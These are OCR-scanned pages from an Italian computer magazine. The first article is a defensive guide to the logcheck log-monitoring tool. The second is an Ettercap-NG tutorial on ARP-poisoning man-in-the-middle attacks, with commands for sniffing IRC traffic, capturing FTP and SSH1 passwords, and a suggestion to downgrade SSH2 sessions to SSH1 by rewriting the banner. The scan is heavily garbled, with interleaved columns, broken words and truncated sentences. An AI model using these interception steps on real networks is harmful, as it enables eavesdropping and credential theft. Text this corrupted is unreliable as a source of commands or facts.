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LE VIOLAZIONI NEGL 


no dei modi per verifi- 
care, ed eventualmente 
scoprire, se un com- 
puter sia stato oggetto 
di tentativi indesiderati 
d'accesso, è quello 

di ricercare le informazioni nei file 

di log, accertandosi che nessuno si 
sia intromesso nel nostro sistema, 
nell'assenza di manomissioni agli 
stessi file. 

Cercare eventi di questo tipo nei vari 
file è un operazione laboriosa, che 
può richiedere ore, se non qualche 
giorno, a seconda delle dimensioni 
dei log e della tipologia di eventi che 
ricerchiamo. Per tale scopo sarebbe 
utile poter disporre di un programma 
che, eseguito ciclicamente, estragga 
dalle informazioni contenute nei vari 
file di log del sistema solo quelle re- 


lative ad eventi anomali o collegati a 
tentativi d'accesso non autorizzati e li 
invii ad un indirizzo di posta (general- 
mente all’amministratore del sistema), 
dopo averli ordinati e organizzati per 
tipologia. 


LOGCHECK: 
LO SCOVA INTRUSI 


Per le finalità appena descritte uti- 
lizzeremo uno script di shell che si 
chiama logcheck, sviluppato da Craig 
Rowland. Le moderne distribuzioni 
contengono questo strumento, ma 
per l’ultima versione si consiglia di 
visitare siti come RPM Find — http:// 
rpmfind.net. Oltre alle distribuzioni 
Gnu/Linux, è possibile installare 
us ili 


") 


Tse: 


PER SCOPRIRE 
SE UN COMPUTER 
SIA STATO 
OGGETTO 

DI TENTATIVI 
DI ACCESSO 
INDESIDERATO 
ESISTONO 
DIVERSI 
STRUMENTI, 
COME 
LOGCHECK... 


ed utilizzare questo software per 

altri sistemi operativi del ceppo Unix 
(FreeBSD, BSDI, Sun, HPUX, Digital- 
©SF/1, Irix) scaricando quanto serve da: 


http://logcheck. org 
Per l'installazione è necessario essere TL, 
utente root e digitare: 


$ rpm —ivh logcheck-1.3.13-4.j386.rpm 


Se vogliamo visualizzare la lista dei 
file che sono stati installati sulla no- 
stra macchina, occorre eseguire il 
comando “rpm —qil logcheck”. |. prin- 
cipali file che saranno listati devono 
essere i seguenti: 


/usr/bin/logtai 
/etc/logcheck/hacking 
/etc/logcheck/violations 
/etc/logcheck/violations . ignore 
/etc/logcheck/ignore 
/usr/bin/Logcheck.sh 
te/cron.hourly/logcheck 


Esaminiamo quelli più importanti. 


/usr/share/doc/logcheck-1.3.13 
contiene i file di documentazione rela- 
tivi al pacchetto (README, INSTALL, 
CHANGES, ecc.); 


/var/logcheck 


è utilizzata come directory d’appog- 
gio del file di log temporaneo, creato 
durante l'esecuzione di logcheck; 
questo file è costituito dall’accoda- 
mento di tutti i log di sistema che 
vogliamo controllare ed è cancellato 
al termine dell'esecuzione dello script; 


/usr/bin/lagtail 


logtail è un programma, eseguito 
all’interno della script logcheck.sh, 

in grado di memorizzare il puntatore 
relativo all’ultima riga del file di log 
esaminato, ed è possibile utilizzarlo 
anche per altri file di tipo testuale, nel 
caso vi serva una funzione di questo 
tipo. Durante le successive esecuzioni 
dello script, le righe dei file di log che 
sono già state lette in precedenza, 
saranno scartate. Per ogni file di log 
sarà creato, nella stessa directory, 
un corrispondente file “########.0f- 


i ad 
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fset”, dove ####### è lo stesso nome 
del file di log esaminato; questo file 
conterrà un valore numerico riferito 
all’ultima riga letta; 


/ete/logcheck/hacking 


contiene stringhe di caratteri che, se 
trovate nei file di.log, sono riportate 
nel messaggio di posta elettronica 
inviato e sono presentate alla fine 

in una sezione con il titolo “Active 
System Attack Alerts”; 


/etc/logcheck/violations 


in questo file troviamo parole e strin- 
ghe che in genere sono contenute in 
eventi considerati “negativi”; record di 
log contenenti parole come “denied” 
e “refused” attivano durante l'esecu- 
zione di logcheck righe di report nella 
sezione “Security Violations”. 


E' possibile in ogni caso che tali 
eventi, anche se segnalati, possano 
essere accettati (ad esempio un 
utente che ha sbagliato la propria 
password durante la procedura d’ac- 
cesso al sistema); 


fetc/logcheck/violations.ignore 


supponiamo che una stessa stringa di 
caratteri sia contenuta in due diversi 
record di log, ma che solo uno di 
questi debba essere riportato come 
violazione al sistema. Possiamo utiliz- 
zare il file violations.ignore allo scopo, 
‘chiarendo questo concetto l'esempio 
riportato di seguito. 


VIOLATIONS. 
IGNORE IN PRATICA 


A < 


Poniamo di avere due record di log: 


Sep 10 21:00:08 localhost 
sendmai1[23123]: GAA03745: 
to=marvin, ctladdr=root 
(0/9), deloy=08:00:03, 
xdelay=00:00:02, mailer=local, 
stat=refused 


Sep 17 17:17:17 localhost: nshd: 
refused connect from guestuser@ 
localhost :1490 


Poiché vogliamo che solo la se- 
conda riga di log (quella delle ore 
17:17:17) debba attivare un allarme, 
allora inseriremo la stringa “refused” 
nel file violations e “mailer=local, 
stat=refused” nel file violations.ignore 


/ete/logcheck/ignore 


contiene le stringhe da ignorare e 
da non indicare in nessuna sezione 
del report finale; tutte le righe di log 
contenenti parole che non saranno 
trovate in nessuno dei quattro file 
appena visti, utilizzati da logcheck 
per filtrare i log (hacking, violations, 
violations.ignore, ignore), saranno 
‘aggiunte al report finale all’interno 
della terza sezione identificata con 
“Unusual System Events"; 


fusr/bin/logcheck. sh 


questo script shell è il fulcro delle 
attività di controllo e contiene al suo - 
interno varie sezioni contenenti le 
definizioni di variabili relative ai di- 
versi sistemi operativi dove logcheck 
può essere eseguito. Se vogliamo 
quindi eseguire logcheck.sh su una 
macchina con un sistema operativo 
diverso da Linux, occorre rendere 
attive (non commentate) solo le righe 
relative a quel particolare sistema 
perché, rispetto a quest’ultimo, i co- 
mandi utilizzati all’interno dello script 
possono variare. Ad esempio, in lo-. 
gcheck.sh è definita la variabile MAIL, 
che può assumere i valori “mail”, 
“mailx”, “Mail”, rispettivamente per i 
sistemi operativi Linux, HPUX, Digital- 
OSF/1. 


= 


atti 


O AUTOMATICO 


Lo script logcheck.sh può essere 
eseguito manualmente, oppure in 
modalità automatica, inserendo 
nella crontab (tabella dei comandi/ 
programmi eseguiti a tempo dal 
programma cron) quanto segue: 


(per una dettagliata spiegazione 
dei possibili valori che possono 
essere assegnati ai campi di 
crontab usate il comando “man 5 
crontab”). 
La sequenza logica delle ope- 
razioni effettuate dallo script 
logcheck.sh si può riassumere coi 
seguenti punti: 
- è eseguito il programma logtail 
che accoda i file di log in un unico 
file temporaneo, prelevando solo 
le informazioni non ancora trattate 
da precedenti esecuzioni di lo- 
gcheck; 
- per ogni riga del file di log tem- 
poraneo creato, è eseguita una 
scansione per la ricerca delle strin- 
ghe uguali a quelle contenute nel 
file “hacking”, generando, se tro- 
vate, la sezione di report intitolata 
“Active System Attack Alerts”; 
- per ogni riga del file di log è 
eseguita una scansione per la 
ricerca delle stringhe uguali a 
quelle contenute nel file “viola- 
tions”, scartando, per quelle con 
fi confronto positivo, le righe che 
contengono stringhe di carat- 
teri uguali a quelle contenute in 
“violations.ignore” e generando 
la sezione di report intitolata 
“Security Violations”. Circa la rela- 
zione tra “violations” e “violations. 
ignore”, rivedete l’esempio fatto 
quando abbiamo parlato di questi 
due file. La terza ed ultima se- 
zione del report, “Unusual System 
| Events”, contiene tutte le restanti 
informazioni di log che non hanno 
trovato corrispondenza di stringhe 
nel file ignore, precedentemente 
visto. Il report sarà spedito all’in- 
dirizzo di posta definito nella 
variabile SYSADMIN. 


tt] 


Osservando l’immagine precedente, 
nella sezione “Active System Attack 
Alerts”, osservando l’evento regi- 
strato nei file di log alle ore 20:43:47 
è evidente come dall’indirizzo Ip 
192.168.0.99 sia stato impartito un 
comando sendmail di “vrfy”; ciò 
potrebbe indicare l'attivazione di un 
processo telnet sulla porta 25 (smtp) 
per scopi illeciti. L'evento delle ore 
21:49:12, nella sezione “Security 
Violations”, denuncia il fallito tenta- 
tivo da parte dell'utente marvin di 
impartire il comando su (superuser) 


per ottenere i privilegi 
dell'amministratore 

di sistema; in questo 
caso l'utente mar- 

vin aveva sbagliato 

la password di root. 
Nella sezione “Unusual 
System Events”, infine, 
si rilevano tre record di 
log relativi ad opera- 
zioni d'autenticazione; 
sono eventi di normale 
routine durante l’attività quotidiana 
dell’utente, ma non essendo stati 
inseriti nel file “ignore” utilizzato dalla 
script logcheck, sono comunque 
inseriti nel report. Concludendo, 
logcheck sicuramente può essere 
uno degli strumenti da utilizzare per 
implementare una politica di con- 
trollo relativa alla sicurezza di un 
sistema, ma i suoi report devono 
essere continuamente esaminati e 
se sospettiamo attività illecita, la 
frequenza d'esecuzione dello script 
deve essere aumentata. 
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iniziamo col controllare se abbiamo le 
libpcap installate: 
$ 1s1-1 /usr/ib/libpcap.so 
Trwxrwxrwx 1 root root 23 
Jun 12. 2009 /usr/lib/libpcap.so 
> /usr/lib/libpcap.s0.0.8 
$is-L 
/usr/tib/Libpcap .s0.0.8 
=Pwxf=xr-x 1 root root 
164128 Apr 1 2009, 
AUsr/lib/libpcap.s0.0.8 


Troverete un link e quindi la libreria, se 
‘non avete nessuno di questi file allora 
dovrete scaricarli da: 
http://www.tcpdump.org/release/libpca 
|p-0.8.3.targz, l'installazione è molto 
semplice: 

$ tar xzf x 
/usr/portage/distfiles/libpcap+- 
0.8.3.tar.gz 

$ cd libpcap-0.8.3 

# ./configure && make &&-. 
install 


La seconda dipendenza è 
rappresentata dalle libnet, utilizzate per 
fare packet injection, verifichiamo di 
‘averle: Î 
$ ls /-1 /usr/lib/o 
libnet.a 

«rw-r--r--. 1 root root 138828 
Apr. 2. 2009 /usr/lib/libnet.a 


Se non le avete scaricatele da qui: 
http:/www.sfr- 
fresh.com/uniy/privat/libret-1.1,2-1.tar. 
9g2/., l'installazione è semplice(come 
per le libpcap: 

$ tar xzfa 
/usn/portage/distfilés/libnet-- 
1.1.2/1.tanugz 

$ cd libnet 

# ./configure && make &&- 
Make install 


Ed, infine, le libltdl per l'utilizzo dei 
plugin, queste lib (che molto 
probabilmente non avrete) sono parte 
delle libtool, perciò installeremo libtool, 
scaricatele da qui: 
http://ftp.gnu.org/gnu/libtool/ e quindi: 

$ tar xzf libtool- 
2.2.tar.9z 

$ cd libtool-2.2 

$../configure 8& make 8& 
make install 


Le ultime due dipendenze saranno 
necessarie se avrete intenzione di 
usare ettercap da dentro © 
X, nel primo caso vi basterà avere le 
ncurses, nel secondo dovrete installare 
le GTK+, maiper questo vi rimanidoral,,. 
README del o perché 


l'installazione gni Ù 


aparte, 
Infine, se desiderate testare la 
dissection dei-protocolli SSH, avrete 
bisogno di openssi: 

$ 1s,-t/usr/lib/libssl.a 

riiuno-r--., L'itoot’‘tvot@ 
308012 De&:27. 01 :27- 
/usr/TiB/tibsst: 


0.9.89; tar. gz 
$ cd openssl- -0.9.89 
# ./config && make 88 
Make test && make install 


E quindi passiamo all’installazione di 
Ettercap: | 
% $ tar xzf ettercap-NG-- 
07,3:tar. gz 

$ cd ettercap-NG-0.7.3 

# ./configure && make &&- 
make install 


Per avviarlo, ovviamente, abbiamo 
bisogno dei permessi di root, possiamo 
scegliere tre modalità differenti di 
interfaccia grafica: 


# ettercap -T // Per 
avviarlo in modalita’ testo 

# ettercap -C // Per 
avviarlo con le ncurses 

# ettercap -G // Se siamo 
sotto X e vogliamo una GUI 


Se siete in un terminale avviate il 
programma con “-C”, se invece avete a 
disposizione un server grafico, usate “- 
G". Nel caso di interfaccia con ncurses 
ricordate che potrete navigare tra le 
finestre con il tasto “Tab”, e potrete 
chiuderle con “Ctrl+Q”, se invece avete 
‘avviato Ettercap da un Xterm potrete 
usare direttamente il mouse. 

Sotto il menu “Sniff" troverete due 
possibilita”: “Unified Sniffing” e 
“Bridged Sniffing”, analizziamoli 
‘entrambi per capirne il loro significato. 


PreS PRI 
ica. STNrfao 
Scegliendo. questa opzione Ettercap 
‘prenderà ‘tutti i pacchetti in transito 
sul. caVo, ne verificherà la 
destinazione e se non sono diretti alla 


macchina dalla quale stiamo 
‘operando, li redirezionerà 


+» direttamente sulla rete. Scegliendo 


‘questo tipo di sniffing l'IP forwarding 


verrà logicamente disabilitato, questo 


per evitare che un pacchetto venga 
rimandato all’host di destinazione due 
volte, una da Ettercap e una dal 
Kernel. Gli autori ci avvisano anche di 
utilizzare con attenzione questa 
modalità se ci troviamo su un 
gateway, questo perché Ettercap 
ascolta il traffico su una singola 
interfaccia di rete e su una macchina 
dotata di più interfacce, non sarebbe 
possibile ri-routare il traffico nelle 
giuste direzioni. 


‘Quindi, se vi trovate su un gateway, 
prima di iniziare lo sniffing, andate sul 
menu “Options” e selezionate 
l'opzione “Unoffensive” (che dice ad 
‘ettercap di NON disabilitare il packet, II 
forwarding del kernel). Una volta 
avviato lo sniffing dal menu “Start” 
potremo operare tutti i tipi di attacchi 
man-in-the-middle (MITM d'ora in poi) 
che il programma mette a nostra 
disposizione. 


Biid0Cd Stiffinoa 


Come suggerisce il nome stesso, in 
questa modalità sarà possibile 
effettuare lo sniffing del traffico 
utilizzando la nostra scheda di rete in 
modalità bridge, avremo quindi 
bisogno di due interfacce dal 
momento che quella che viene posta 
in bridged mode diventerà 
‘completamente trasparente al traffico, 
‘e quindi non sarà possibile utilizzarla 
per manipolare i pacchetti. 

Questa opzione, sebbene presenti lo 
“svantaggio” di dover disporre di due 
‘schede di rete, rende le nostre 
‘operazioni assolutamente invisibili agli 
altri... Ma prima di entrare nel 
dettaglio, abbiamo bisogno di 
‘conoscere le basi di una rete di 
computer. 


COMPUTER/DIFFICILE 


RETI, LAYER E HUB 


Una rete, supponiamo per il 
momento che sia solo la nostra LAN 
o quella che abbiamo in ufficio, è un 
insieme di Layer (cioè livelli), ognuno 
dei quali svolge un compito diverso. 
A seconda dei casi una rete può 
‘essere considerata come un 
‘sandwich di 5 o 7 layer differenti, ma 
nel nostro caso avremo bisogno 
‘soltanto di conoscere î\primi 4, che in 
ordine sono: 


Layer 4 Trasporto 
Layer 3 Network 
Layer 2 Datalink 
Layer 1 Fisico 


Il primo layer viene utilizzato per il 
trasporto dei segnali elettrici che 
rappresentano i dati che viaggiano’ 
sulla rete, questi segnali (che in 
genere sono onde quadre) viaggiano 
da una parte all'altra tramite cavi, 
raggi laser, onde elettromagnetiche o 
raggi infrarossi, quindifa trasmissione 
‘del segnale fa parte del Layer Fisico. 
Questo layer si occupa del controllo 
dei segnali, verifica che non ci siano 
stati problemi. € si accorge se'un 
‘segnale è arrivato disturbato a causa 
di'dollisioni 0 problemi sul mezzo di 
trasporto. 


Il secondo layer diventa un pochino 
più astratto, su questo livello 
viaggiano i pacchetti datalink, nel 
caso di una Lan Ethernet (ne esistono 
svariati altri tipi) questi pacchetti 
hanno una lunghezza fissa e 
contengono, oltre la parte riservata ai 
dati, un indirizzo sorgente ed uno 
destinazione detti MAC Address 
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(Media Access Control Address), 
lunghi 48 bit, ad esempio: 
0A:55:84:F2:68:51. Ogni scheda di 
rete ha un MAC Address unico în 
tutto il mondo, ed esistono alcune 
normative per evitare che due 
aziende producano schede con lo 
stesso numero. E*.molto importante 
che il MAC sia univoco'per evitare 
che sulla rete Lan vengano a crearsi 
problemi. Questo livello sî preoccupa 
di effettuare un controllo sui dati dei 
pacchetti, per vedere se sono arrivati 
come ci si aspettava, in caso 
contrario ne chiede il rinvio. ii 

ll terzo layer è quello su cui dimoràilP, 


il protocollo IP bpserininme: 


diciamo che IP è 

postino, lui fa di ) per consegnare 
il. pacco, ma se durante il tragitto 
Viene derubato, allora non dice nulla 
{IP non può semplicemente sapere 
che un pacchetto è andato perso). 

Un pacchetto,IP è formato da un 


Il quarto opere rid 
trasporto, è rappresentato 


i ee 


consegnare i dati con una s@Stanziale ‘| 


Ettercap-NG: 


differenza: TCP instaura una 


‘connessione, e'alla ricezione di ogni 
pacchetto invia una conferma, grazie 
‘a queste procedure il TCP garantisce 
la consegna dei.dati (sempre che la 
linea non sia interrotta, o la macchina 
spenta, ma in questo caso TCP ce lo 
direbbe immediatamente). UDP, 
invece, consegna i dati su una 
determinata porta senza 
preoccuparsi se arrivino 0 meno a 
destinazione, se.un pacchetto UDP si 
perde, non lo sapremo mai, ma se 
aftiva saremo sicun che i dati in esso 
contenuti sono esattamente quelli 
inviatie non contengono alterazioni. 
L'assenza diuna connessione con 
conferma di arrivo rende UDP più! ' 
veloce, e quindi appetibile su 
protocolli dove la latenza è 
importante (protocolli realtime 0 di 
‘online gaming), mentre TCP è 
preferibile dove è nedessario sapere 
se i dati sono arrivati o meno. 
(immaginate di inviare un mail e 


sentirvi dire che.è atri n a ‘pezzetti, 


i Lucido ‘sopra il nostro IP come 
sorgente; e quello del sito della rivista 
come destinazione. Ora si scende a 
layer:2, dove il pacchetto viene 
‘imbustato in un pacchetto datalink sul 
quale verrà scritto come indirizzo 
sorgente il nostro MAC e come 

Î destinazione non verrà scritto l'indirizzo 
MAC del sito della rivista perché noi 
non possiamo conoscerlo (sappiamo 
infatti solo il suo IP), ma verrà scritto 
l’indirizzo MAC della macchina che 

invierà sulla rete internet il nostro 
pacchetto, in questo caso quello del 
router. Ed'ora il layer 1 invierà un 
segnale che verrà inoltrato sul cavo. 
La scheda di rete del router vedrà il 
segnale (layer 1), lo leggerà, e N 
verificherà che si tratta di un ft 


contrario verrebbe ignorato), pra 
'. prende nota del mittente, scarta 
l'intestazione MAC e ne legge l'IP, 
preleva questo pacchetto (a layer 3) è 
lo invia su internet. Dopo pochi 
j millisecondi il server della rivista lo 


; vedrà in arrivo sulla porta 80 (di NUOVO |, 


layer 4), scarterà l’instestazione del 
TCP. leggerà il contenuto del pacchetto. 
e ci invierà il file. Tutto questo in 
pochissimi millisecondi- 


(Considerate ora una lan'con più di dllé* 


PC, per collegarli tra loro saprete che è 
necessario un Hub 0 uno! Switch. Le 
Guardandolo, a meno che non ci si 
scritto sopra, non potrete capii 
tratta di un Hub o di uno 
— se potrebbe sembrare un 
nulla la differenza tra qi 
‘dispositivi è enorme. È) 
Un hub innanzitutto funziona soltanto a 
Layer 1, è praticamente un ripetitore di 
‘segnali, non si preoccupa di leggere il 
| pacchetto in sé, lui ascolta per un 
segnale e poi lo ripete su tutte le porte. 
Se su un hub il segnale arriva sulla 
porta 2, verrà amplificato e ritrasmesso 
‘su tutte le altre porte ad eccezione di 
quella sorgente. Sapete questo cosa 
vuol dire? Che con pochi accorgimenti, 
possiamo leggere il traffico di tutti gli 
‘altri, anche quello non destinato a noi. 
Uno switch invece funziona a layer 2 (i 
più costosi anche a layer 3), ciò vuol 
dire che il dispositivo deve poter 
leggere il pacchetto per poterne trovare 
il MAC sorgente e il MAC destinazione, 


, anche 
lio da 


funzionamento di una 


RE SIE gr e 


leggere il pacchetto, presto detto: 


sapendo ac ‘chi è destinato.non Siamo 


sulla porta tove è il nostro 
destinatario. Su è 
quindi o, Sn 


acquisitè fino a'questo punto) ascoltare, | 


il traffico che‘amiva sui pc degli altri. 
utenti, semplitemetite perché... questo 


faire gaia] va agere 


Uno switcti, inoltre, >, consente di 


Piram , ed il suo 
è “semplicemente” quello di 
tradurre i pacchetti da un protocollo 


(Aia: ‘se necessario,e metterli sulla 
‘ giustarrotta. — ti 


rapeneni a MII 
rete se vogliamo 
capire come fa a funzionare uno sniffer, 
e cos'è un attacco MITM, ora che tutto 
è stato spiegato, possiamo tornare a 
divertirci con Ettercap. 


———___—____———_—_____— 
SNIFFING E MITM 
VWELITIM ILS LIA A eM00RA RATES SETTPZIZNENIOTITI PODEITAZI. 


Per sniffare il traffico è necessario un 
‘solo accorgimento, a layer 2 la nostra 
sheda di rete semplicemente ignora i 
pacchetti che non hanno come MAC di 
destinazione il nostro MAC. Come 
ovviare? Basterà mettere la scheda in 
modalità promiscua, tale modalità farà 
sì che la nostra scheda invii al kernel 
‘tutti i pacchetti che attraversano il 
cavo, siano essi destinati a noi o meno. 
Non è assolutamente difficile, dotatevi 
dei privilegi di root e fate: 

# ifconfig eth0 (cambiate 
eth@ con la vostra: interfaccia) 

ethd Link 
encap: Ethernet  HWaddr- 
00:04:24:CA:B6:21 

inet addr:192.167.1.12+ 
Bcast;192,167.1.255 


Mask:255,255.255.0 
UP. BROADCAST RUNNING- 
MULTICAST  MTU:1500 Metric:1 


Sulla prima riga potete vedere il vostro 
indirizzo Layer 2 (00:04:24:CA:B6:21), 
‘sulla seconda l'indirizzo Layer 3 
(192.167.1.12) e sulla terza le opzioni, 
come vedete non c'e’ scritto che la 
scheda è in modalità promiscua, 
poniamo rimedio a tutto ciò: 

# ifconfig eth@ promisc 

etho Link 
encap: Ethernet  HWaddr- 
00:04:24:CA:B6:21 

inet addr;192.167.1.12 
Bcast:192,167.1.255- 
Mask:255.255, 255,0 

UP BROADCAST RUNNING 
PROMISC MULTICAST  MTU:1500- 
Metric;1 


AK 


‘Ok ora siamo in modalità promiscu: 
‘tutti i pacchetti saranno letti dalla 
scheda di rete, non. è comunque 
necessario fare a mano questa. | 
‘operazione, Ettercap logicamente la 
farà per noi, perciò rimettiamo tutto 
‘come era prima: 

# ifconfig eth0 -promisc 


Hi Do 


Proviamo quindi ad avviare una 
sessione di sniffing, apriamo una 
console e digitiamo: 

# ettercap -Tp (avvia in 
modalita’ testo e promiscua) 


Tutti i pacchetti saranno stampati a 
schermo, bloccate tutti i vostri 

download e cercate di guardare gli 
indirizzi, se vede pacchetti dove voi 

NON siete presenti né nella destione né 
nel sorgente, allora vi trovate su un 

Hub, se, invece, non vedete del traffico 
“estraneo” allora siete su uno switch, 
cosa si fa allora? 


È ai 2 
COMPUTER/DIFFICILE 


Nessun problema, con un po’ di 
intuito scoprirete che trovare una 
soluzione non è affatto difficile. 
Mettetevi nei panni del router appena 
‘acceso, le sue tabelle saranno vuote, 
in quel medesimo istante arriva un 
pacchetto dalla rete internet destinato 
ad un IP pubblico presente nella sua 
lan... Cosa fa? Crea un pacchetto 
particolare, destinato a tutti (tale 
pacchetto si chiama broadcast e da 
“tutti” è identificato con questo 
indirizzo MAC: FF:FF:FF:FF:FF:FF) 
con scritto dentro “who-has ip” cioè 
“chi ha questo ip?”, tutte le macchine 
leggerano il pacchetto ma risponderà 
soltanto quella che possiede l'IP 
cercato dicendo: “reply l'ipè a 
01:02:03:04:05:06". Il router saprà 
quindi a quale MAC appartiene 
quell’IP e sarà in grado di creare un 
pacchetto Layer 2 per inviare la 
richiesta proveniente da internet sulla 
rete Lan, verso l'IP cercato. 

La gabola è ora sicuramente più 
chiara, se su uno switch non 
possiamo leggere il traffico destinato 
agli altri, perché non ce lo facciamo 
mandare che è più comodo? 
Supponiamo quindi di voler ricevere 
tutto il traffico che la macchina A 
manda su internet tramite il gateway 
G, noi siamo B, come facciamo? 


INDIRIZZI IP E MAE 
srmenisimzzeIInI rest rien 


Chiariamo la situazione disegnandoci 
una tabella dei corrispondendi IP e 
MAG: 


Macchina MAC IP 
A 01:02:03:04:05:06 192.167.1.10 
Bit 14; 6 192.167.131 


G 21:22:23:24:25:26 192.167.1.1 


Possiamo risolvere brillantemente il 
problema in due soli step: 


Inviamo un pacchetto ad A 
dicendo: “reply 192.167,1.1 is 
at 11:12:13:14:15:16” 

Inviamo un pacchetto a G 
dicendo: “reply 192.167.1.10 is 
at 11:12:13:14:15:16” i 


| pacchetti vengono accettati? Certo! 


v 


Non è necessario un arp-request 
perché un computer modifichi la sua 
arp-cache (la tabella dove vengono 
mantenute le corrispondenze mac-ip) 
e se anche fosse necessario, 
basterebbe poco per fargliene 
mandare uno. Dopo di che, G saprà 
che l’IP di A corrisponde al nostro 
MAC, e A saprà che l'IP-diG 
corrisponde al nostro MAC. Perciò A 
invierà a noi credendo di inviare a G, e 
G invierà a noi credendo di inviare ad 
A. Manca qualcosa? Sì, tutto il traffico 
che arriva a noi da uno dei due host 
‘andrà reindirizzato verso l’altro, 
altrimenti non potrà instaurarsi 
nessuna connessione, questo si 
chiama: attacco MITM. Ovveto, 
qualcuno è nel mezzo della 


macchine della rete senza modificare 
il traffico, allora si tratta solo di 
sniffing. 


internet, quindi davremo fare un 
attacco MITM tra la ihacchina 
e il gateway, sulle porte classici 


servizio IRC, cioè ii pugcnere e qi 
vanno da: 6666 
(è indifferente i 


Ettercap-NG: 


lab la rete è cablata‘ su switch, 
altrimenti non potrei sniffare nulla (-M 
‘arp) e di leggere tutto il traffico 
proveniente dalla vittima 
(/192.167.1.3/) direttò a qualunque 
host (//) sulle porte che vanno da 
6666-6669. Una volta avviato Ettercap 
colleghiamoci ad un qualunque server 
irc, mandiamo qualche messaggio di 
test, in seguito premiamo “q” sul 
prompt dove sta girando Ettercap ed 
‘esaminiamo illog, per farlo dovremo 
‘solo usare etterlog: 


# etterlog irc.log.ecp 


Tue Jan 26 18:48:50 2009- 
[765199] 

TOP. *.t*.*16666 +->- 

192 ‘167.13: 19581 AP. 
itest!-test@*. it ‘PRIVMSG test- 
iciao. 


Tue Jan 26 18:48:51 2009 


» 


nostra. 


Soltanto le password, ‘ovviamente { 
Registriamo sia chiave 


richiediamo il solito attacco MITM 
sull’host vittima verso qualunque ftp, server che, del'elient. 
ecco cosa succede alla prima sessione ia 
ftp: i In questo modo il client cifreràltraffico 
verso il server con la.nostra chiave 
FTP: 212.84.*.*:21 >. pubblica,e cosi farà È. 


| USER: mirko PASS: my_pass 
connessione Sià da client-server che'da.. 
Viene mostrata a schermo solo la server-client:(questo si dice Full-Duplex 
password del server e questo grazie IMITM), ovviamente tutto il traffico in 
all'FTP dissector, ovviamente Ettercap |. . arrivo su di noi verrà decifrato;laggato . 
‘supporta una serie di altri protocolli che |. e quindi ciffato di nuovo con la'chiave 
‘sono: telnet, pop, rlogin, ssh, icq, smb, ne client. 1 due ‘computer 


mysgl, http, nntp, x11, napster, irc, rip, quella è è la loro 
bgp, socks 5, imap 4, vne, ldap, nfs, |. Alli tb 
snmp, half life, quake 3, msn, ymsg.: |. tratta della seconda 

A questo punto dovreste aver notato , ii rei rare li 
una cosa interessante... E' possibile. è cambiata, tuttaviamolti utenti non 


visualizzare in chiaro anche il traffico tengono-corito dell'a ‘avviso (pensando 
Ssh1, ma come si fa? Sshi utilizza un ‘magari che la chiavé è cambiata a 

meccanismo di scambio a chiave. | — causa di un aggiornamento di ssh) e 
pubblica (0 asimmetrica), che funziona > quindi si espongono a questo tipo di 


in questa maniera: attacco. sì 

Il client genera un numerò casuale di î 
128-256 bit che sarà la chiave con cui LA PRATICA 
verrà cifrato tutto il 


la propria \.. Ma vediamo in pratica come è possibile 
chiave pubblica. le passwotd:a il traffico su un 
Il client cifra il numero generato, con la. server ssh1. Nell'esempio vedremo un 
chiave pubblica del server e gliela invia: attacco MITM tra una macchina 
Il server decifra con la sua chiave (192.167.1,8) e un server ssh1, avviamo 
privata questo numero ed inizializza la. Ettercap con questi parametri: 


sessione. 
Pol # ‘ettercap -Tq -M- 
Il meccanismo di scambio viefie dettoa arp /192.167.1.8/ //22 
= chiave “asimmetrica” perché tutto ciò 


Il client richiede al 


che si cifra con la chiave ica di Diciamo cosi al programma di avviarsi 
qualcuno, può essere decifrato solo in modalità testo, senza stampare tutti i 
con la sua chiave privata. Provate ora pacchetti, di fare un attacco MITM 


ad entrare nell'ottica dell’attacco MITM, tramite arp-poisoning (sempre perche’ il 
questo meccanismo non garantisce mio lab si trova su switch) tra l'host 
affatto chela chiave ricevuta sia proprio  192:167.1.8 e tutte le connessioni che 
quella del client... Perciò sfruttiamo questo host fa sulla porta 22. 

questa falla nell’autenticazione e Portiamoci quindi sull'host 192.167.1.8 
comportiamoci in questo modo: ed apriamo una connessione ssh: 


# ssh HYPERLINK 
"mailto:mirk@192.167.1.10"- 
mirk@192.167.1.10 


‘Arp-poisoniamo il client e redirigiamo 
su di noi il suo traffico. 
Arp-poisoniamo il server e facciamo la 
‘stessa cosa. 

Quando il client invia la sua chiave Vediamo subito che SSH ci avverte del 
pubblica, al server inviamo la NOSTRA — cambiamento della chiave (perché 
“Chiave. durante la prima connessione la chiave 
Quando il server invia al client la sua viene registrata), tuttavia scegliendo di 
chiave pubblica, noi gli inviamo la accettare la chiave possiamo 


Saremo quindi in grado dì spiare la* um, 


risultato: 


e WARNING: REMOTE HOST 
ll izioi a CHANGED! @ 


IT IS POSSIBLE THAT SOMEONE TS 
DOING SOMETHING NASTY! 

Someone could be eavesdropping on 
you right now (man-in-the-middle 
attack)! 

It is also possible that the RSA 
host key has just been changed, 
The fingerprint for. the RSA key 
sent by the remote host is i; 
44:16:b4;d8:11:4d:cf:10:87:11:00:5 
8:25:63:c5:fa. 

Please contact your system 
administrator. 


Come da copione la password di n 
viene loggata all'istante: 


SSH : 192.167.1.10:22 -> USER: 
mirk PASS: p4ssw0rD 


CONCLUDENDO 


Ma volendo anche tutto il traffico ssh 
‘sarebbe visibile, perciò potremmo 
‘spiare senza alcun problema tutta la 
‘sessione che sta facendo l’utente. E 
‘questo vale con ssht, ma per ssh2? In 
questo caso viene utilizzato il Diffie- 
Hellman come algoritmo di scambio 
delle chiavi. Diffie-Hellman complica le 
‘cose perché include dei check (firma 
digitalmente una chiave di scambio) per 
verificare che effettivamente la chiave 
Sci sia quella del client o del 


Fheprime parte) 


Tecnicamente è molto, molto ©’ SO A 


‘complesso aggirare un tipo di 
l ‘autenticazione con algoritmo Diffie- 
Hellman, ma noi possiamo:sempre 
porre rimedio alla situazione con un 
NE ‘semplice trucco. Provate a connettervi 
via telnet alla porta 22 di;uri server ssh1, 
otterrete questo banner! | — 


SSH-1/5 
Mentre collegandovi ad ‘un server ssh2 


otterrete questo: « 1 


& SSH-2.0 


=, 88 vedete ssh-1.5 0 1.55 allo 


‘| supporta soltanto ssh1, 
Ssh-1.99 0 superiori, Îl server 
supporta sia ssh1 che ssh2, questo 


non vi fa venire in'mente nulla? Cosa 
succederebbe se in fase di connessione 
il banner “SSH-2.0” del server venisse 
sostituito con “SSH-1.5"? Che il client 
crederebbe di dialogare con un server 
in grado di supportare soltanto ssh1 e 
‘quindi utilizzerebbe il classico algoritmo 
di scambio senza firma digitale... 
Pertanto il vostro traffico verrebbe 
intercettato senza che voi notereste 
nulla, 0 quasi. 

Proteggersi da questo tipo di attacco 
risulta comunque abbastanza semplice, 
